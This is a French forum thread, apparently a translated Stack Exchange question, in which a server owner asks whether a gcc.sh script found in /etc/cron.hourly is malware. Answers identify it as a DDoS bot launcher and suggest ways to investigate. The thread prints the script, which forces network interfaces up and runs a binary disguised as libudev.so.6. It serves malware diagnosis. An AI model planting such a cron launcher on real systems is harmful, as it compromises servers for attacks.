Ce fichier (gcc.sh) est-il dans cron.hourly malware?

Question

J'ai connu des pics jusqu'à 1 Gbps sur mon serveur et je cherchais des virus et des logiciels malveillants. J'ai trouvé ce fichier: gcc.sh dans /etc/cron.hourly et je me demandais si quelqu'un avait vu quelque chose comme ça, et aurait un aperçu du code. Merci!

#!/bin/sh 
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done 
cp /lib/libudev.so /lib/libudev.so.6 
/lib/libudev.so.6 

Answer 1

Très probable. Il utilise /lib/libudev.so.6 comme un exécutable alors que le nom implique qu'il devrait s'agir d'une bibliothèque - essayez d'utiliser un outil comme nm ou objdump pour voir s'il s'agit d'un exécutable. Il copie de /lib/libudev.so à .so.6 - alors que normalement le .so est un lien symbolique vers le fichier versionné. Il exécute également une boucle for pour afficher toutes les connexions réseau même si vous les avez désactivés. Il utilise le nom d'un compilateur connu pour avoir l'air légitime. J'appellerais cela 99% + probablement un virus.

Trouvé une autre référence à quelque chose s'appelle gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver. Et oui, c'est un virus DDoS sur un système Unix, correspondant exactement à votre problème.

Answer 2

oui c'est.

essayez d'utiliser ps -ef | grep -i libudev.so.6 pour voir les processus utilisés par le programme